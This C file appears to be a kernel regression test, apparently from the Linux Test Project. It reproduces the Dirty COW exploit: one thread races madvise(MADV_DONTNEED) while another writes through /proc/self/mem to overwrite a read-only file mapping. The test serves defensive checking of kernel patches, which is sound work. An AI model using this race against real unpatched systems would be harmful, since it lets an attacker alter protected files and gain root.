| /* |
| * Copyright (c) 2016 Cyril Hrubis <chrubis@suse.cz> |
| * Based on: https://github.com/dirtycow/dirtycow.github.io |
| * |
| * This program is free software: you can redistribute it and/or modify |
| * it under the terms of the GNU General Public License as published by |
| * the Free Software Foundation, either version 2 of the License, or |
| * (at your option) any later version. |
| * |
| * This program is distributed in the hope that it will be useful, |
| * but WITHOUT ANY WARRANTY; without even the implied warranty of |
| * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
| * GNU General Public License for more details. |
| * |
| * You should have received a copy of the GNU General Public License |
| * along with this program. If not, see <http://www.gnu.org/licenses/>. |
| */ |
| |
| #include <sys/mman.h> |
| #include <fcntl.h> |
| #include <pthread.h> |
| #include <unistd.h> |
| #include <sys/stat.h> |
| #include <string.h> |
| #include <stdlib.h> |
| #include <pwd.h> |
| |
| #include "tst_safe_pthread.h" |
| #define TST_NO_DEFAULT_MAIN |
| #include "tst_test.h" |
| |
| #define FNAME "test" |
| #define STR "this is not a test\n" |
| |
| static char *str = "m00000000000000000"; |
| static void *map; |
| static int mfd; |
| |
| /* |
| * You have to race madvise(MADV_DONTNEED) :: |
| * https://access.redhat.com/security/vulnerabilities/2706661 |
| * |
| * This is achieved by racing the madvise(MADV_DONTNEED) system call while |
| * having the page of the executable mmapped in memory. |
| */ |
| static void *madvise_thread(void *arg) |
| { |
| int c = 0; |
| |
| (void)arg; |
| |
| while (1) |
| c += madvise(map, 100, MADV_DONTNEED); |
| |
| tst_res(TINFO, "madvise: %i", c); |
| |
| return NULL; |
| } |
| |
| /* |
| * You have to write to /proc/self/mem :: |
| * https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16 |
| * |
| * The in the wild exploit we are aware of doesn't work on Red Hat Enterprise |
| * Linux 5 and 6 out of the box because on one side of the race it writes to |
| * /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise |
| * Linux 5 and 6. |
| */ |
| void *proc_self_mem_thread(void *arg) |
| { |
| int c = 0; |
| |
| (void)arg; |
| |
| while (1) { |
| lseek(mfd, (uintptr_t) map, SEEK_SET); |
| c += write(mfd, str, strlen(str)); |
| } |
| |
| tst_res(TINFO, "write: %i", c); |
| |
| return NULL; |
| } |
| |
| void sighandler(int sig) |
| { |
| (void) sig; |
| |
| _exit(0); |
| } |
| |
| /* |
| * You have to use MAP_PRIVATE for copy-on-write mapping. |
| * Create a private copy-on-write mapping. Updates to the |
| * mapping are not visible to other processes mapping the same |
| * file, and are not carried through to the underlying file. It |
| * is unspecified whether changes made to the file after the |
| * mmap() call are visible in the mapped region. |
| */ |
| int main(void) |
| { |
| pthread_t pth1, pth2; |
| int fd; |
| struct stat st; |
| |
| SAFE_SIGNAL(SIGUSR1, sighandler); |
| |
| /* Open it read only and map */ |
| fd = SAFE_OPEN(FNAME, O_RDONLY); |
| SAFE_FSTAT(fd, &st); |
| |
| map = SAFE_MMAP(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0); |
| mfd = SAFE_OPEN("/proc/self/mem", O_RDWR); |
| |
| /* Try to rewrite it */ |
| SAFE_PTHREAD_CREATE(&pth1, NULL, madvise_thread, NULL); |
| SAFE_PTHREAD_CREATE(&pth2, NULL, proc_self_mem_thread, NULL); |
| |
| pause(); |
| |
| return 0; |
| } |